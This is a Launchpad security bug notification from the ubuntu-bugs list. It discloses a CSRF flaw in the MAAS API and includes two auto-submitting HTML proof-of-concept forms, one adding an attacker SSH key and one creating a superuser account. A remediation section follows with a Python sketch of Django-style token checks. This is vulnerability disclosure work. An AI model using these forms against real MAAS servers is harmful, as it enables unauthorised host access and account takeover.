*** This bug is a security vulnerability ***

You have been subscribed to a public security bug by Seth Arnold (seth-arnold):

Because of the flexibility of the API, various actions could be performed as part of a CSRF attack. For example, by enticing a logged-in user to visit a page containing the following HTML, a remote attacker could trick the user into adding an SSH key.

<html>
    <body>
    <form action="https://maas-server-address/MAAS/api/1.0/account/prefs/sshkeys/" method="POST" name="netcraftForm">
        <input type="hidden" name="op" value="new" />
        <input type="hidden" name="key" value="ssh-rsa 
AAAAB3NzaC1yc2EAAAABIwAAAQEAol9Jq3adiM0jp5MdD3lwMbtQ2jaPiHJstCYcG71Tl94PoXAQHMG7
eJygNMH2y2TofnqCLnEU57zfK2BG3oTtraKjyvNqnh3eKMNI73O+L73LKmWfvF77mgMkjzxYOKOlOgNe
V5Bx94yi0jfMNir8GRid4/o07RdjZ8eqBjDcglat/fzuumKKoXB5fPbaogYsQT/4n1x6E7KexS+GD0y2
xc3SkKOaWV/HpbaepyezV9ObLATKjmW4pnOl6XHyRxy7Ds6IAuizw4DaIxgbYC8Ep+w0eNs6CerV4DxI
kswXNwi8Z8qK9mYlDjdamsXr1GKHH8zbHH4w1hHLFL8FTe4c9Q== [email protected]" />
        <input type="submit" />
    </form>
    <script>
        document.netcraftForm.submit();
    </script>
</body>
</html>

This could potentially give the attacker SSH access to hosts. Other simple attacks could include adding oauth keys, uploading and deleting files, or setting configuration values – for example, changing the HTTP proxy used by nodes or uploading custom commissioning scripts.

In MAAS version 1.5, more API actions have been implemented, and as a result several extra attacks are possible. For example, new user accounts can be created via HTML such as:

<html>
    <body>
    <form action="http://maas-server-address/MAAS/api/1.0/users/" method="POST" name="netcraftForm">
        <input name="username" value="test" type="hidden">
        <input name="email" value="[email protected]" type="hidden">
        <input name="password" value="test" type="hidden">
        <input name="is_superuser" value="1" type="hidden">
        <input type="submit">
    </form>
    <script>
        document.netcraftForm.submit();
    </script>
</body>
</html>

= Remediation =
Most of the MAAS application is protected against cross-site request forgery attacks using Django’s built-in anti-CSRF middleware. This validates requests by ensuring that a cryptographic nonce which is included in a cookie also appears in HTTP requests which result in configuration changes. Netcraft recommends that, if possible, when API requests are authenticated using Django’s sessionid cookie, the framework’s CSRF protection is also used.
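
The check recommended above, sketched as an added example (not code from MAAS, Django or the report): a simplified model of the cookie-nonce comparison, applied only when a state-changing request relies on the sessionid cookie. The function names, the plain-dict request model and the "OAuth " header test are assumptions; the csrftoken cookie, X-CSRFToken header and csrfmiddlewaretoken field are Django's default names.

```python
import hmac
import secrets

SAFE_METHODS = {"GET", "HEAD", "OPTIONS", "TRACE"}

def issue_csrf_token():
    """Random nonce, set as the csrftoken cookie and echoed by same-origin pages."""
    return secrets.token_urlsafe(32)

def csrf_gate(method, headers, cookies, form):
    """Return (allowed, reason). Arguments are plain dicts (constructed model)."""
    if method in SAFE_METHODS:
        return True, "safe method"
    # Header credentials are never attached automatically by a browser, so a
    # forged cross-site form cannot carry them. Verifying the OAuth signature
    # itself is a separate step that this model does not cover.
    if headers.get("Authorization", "").startswith("OAuth "):
        return True, "header credentials, CSRF check not applicable"
    if "sessionid" not in cookies:
        return False, "unauthenticated"
    # Session-cookie authentication: the browser sends the cookie with any
    # cross-site POST, so the nonce from the cookie must be repeated in a
    # header or form field, which a page on another origin cannot read.
    cookie_token = cookies.get("csrftoken", "")
    sent_token = headers.get("X-CSRFToken") or form.get("csrfmiddlewaretoken", "")
    if not cookie_token or not sent_token:
        return False, "CSRF token missing"
    if not hmac.compare_digest(cookie_token.encode(), sent_token.encode()):
        return False, "CSRF token mismatch"
    return True, "session with valid CSRF token"

def demo():
    """Run the gate over constructed requests shaped like the SSH-key call."""
    token = issue_csrf_token()
    cookies = {"sessionid": "constructed-session-id", "csrftoken": token}
    body = {"op": "new", "key": "ssh-rsa PLACEHOLDER"}
    return {
        # Cross-site auto-submitted form: cookies attached, no token echoed.
        "forged_form": csrf_gate("POST", {}, cookies, body),
        # Same-origin client that read the cookie and echoed it in a header.
        "same_origin": csrf_gate("POST", {"X-CSRFToken": token}, cookies, body),
        # Wrong token value supplied by the sender.
        "wrong_token": csrf_gate("POST", {"X-CSRFToken": "guess"}, cookies, body),
    }

if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```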

** Affects: maas
     Importance: Critical
     Assignee: Blake Rouse (blake-rouse)
         Status: Fix Released

** Affects: maas/1.5
     Importance: Undecided
         Status: Won't Fix

** Affects: maas/1.7
     Importance: Undecided
         Status: Won't Fix

** Affects: maas/1.9
     Importance: Critical
     Assignee: Blake Rouse (blake-rouse)
         Status: Fix Released

** Affects: maas/trunk
     Importance: Critical
     Assignee: Blake Rouse (blake-rouse)
         Status: Fix Released


** Tags: netcraft
-- 
MAAS API vulnerable to CSRF attack
https://bugs.launchpad.net/bugs/1298772
You received this bug notification because you are a member of Ubuntu Bugs, 
which is subscribed to the bug report.

-- 
ubuntu-bugs mailing list
[email protected]
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
